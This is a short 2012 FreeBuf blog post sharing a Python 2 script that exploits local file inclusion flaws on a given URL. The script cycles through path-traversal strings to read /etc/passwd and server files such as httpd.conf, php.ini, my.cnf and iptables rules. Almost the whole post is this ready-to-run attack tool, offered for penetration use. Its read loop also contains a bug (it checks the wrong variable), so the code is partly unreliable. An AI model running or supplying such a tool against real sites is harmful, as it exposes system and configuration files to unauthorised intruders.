主站

分类

漏洞 工具 极客 web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据库安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

FreeBuf+小程序

官方公众号企业安全新浪微博

国内领先的互联网安全新媒体,同时也是爱好者们交流与分享安全技术的社区

python探测本地包含文件的小工具
2012-12-17 11:58:05

这几天在学PYTHON,随手写了个这个。

本地包含挨个试文件是否存在的时候很烦的,尤其在找配置文件和WEB路径的时候。

PYTHON写点对渗透有帮助的小东西真的很方便。

paths1和paths2这俩变量是保存路径的。。列表如果觉得不够自己可以加!!

代码:


import urllib2
import sys
var1=0
var2=0
print ("-----------------------------------------------------")
print ("|           usage:path.py site url                  |")
print ("|this url like http://www.google.com/index.php?id=  |")
print ("       writed by eip_0x[Freebuf],just 4 fun         |")
print ("-----------------------------------------------------")


site0=sys.argv[1]+'/kfdsjkf7675637d.txt'
req0=urllib2.Request(site0)
conn0=urllib2.urlopen(req0)


while 1:
    data0=conn0.read(4072)
    if not len(data0):
        break

paths1=['/etc/passwd','../etc/passwd','../../etc/passwd','../../../etc/passwd','../../../../etc/passwd','../../../../../etc/passwd','../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../etc/passwd','../../../../../../../../etc/passwd','../../../../../../../../../etc/passwd','../../../../../../../../../../etc/passwd']
paths2=['/usr/local/app/apache2/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/usr/local/app/apache2/conf/extra/httpd-vhosts.conf','/usr/local/app/php5/lib/php.ini','/etc/sysconfig/iptables','/etc/httpd/conf/httpd.conf','/etc/my.cnf','/etc/issue','/etc/redhat-release','/usr/local/apche/conf/httpd.conf','/etc/httpd/conf/httpd.conf']


for path in paths1:
   site=sys.argv[1]+path
   req=urllib2.Request(site)
   conn=urllib2.urlopen(req)
   while 1:
       data=conn.read(4072)
       if not len(data0):
           break
              
       if len(data)!=len(data0):
           print path," this file has been found!!!!u r lucky and have fun!!!!"
       
       for path2 in paths2:
           path2ok=path.replace("/etc/passwd",path2)
           site2=sys.argv[1]+path2ok
           req2=urllib2.Request(site2)
           conn2=urllib2.urlopen(req2)
           while 1:
               data2=conn2.read(4072)
               if not len(data2):
                   break
               if len(data2)!=len(data0):
                   print path2,"this file has been found!!"

本文作者:, 转载请注明来自FreeBuf.COM

被以下专栏收录,发现更多精彩内容
+ 收入我的专栏
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦